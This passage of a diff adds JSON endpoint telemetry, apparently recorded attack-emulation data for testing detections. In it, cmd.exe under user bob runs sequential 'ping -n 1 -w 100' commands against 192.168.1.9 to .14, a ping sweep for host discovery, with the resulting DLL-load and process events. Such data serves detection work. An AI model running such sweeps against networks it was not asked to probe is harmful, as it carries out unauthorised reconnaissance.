"timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "process", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572026840000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.9", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5688, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572026980000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "process", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572031990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.10", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 904, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572032130000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "process", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572036840000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.11", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6288, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572036980000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "process", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572041990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.12", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1688, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572042130000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572041990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "process", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572046830000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.13", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1340, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572047029984, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572049020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572049020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572049020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "process", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572051990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.14", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3452, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": 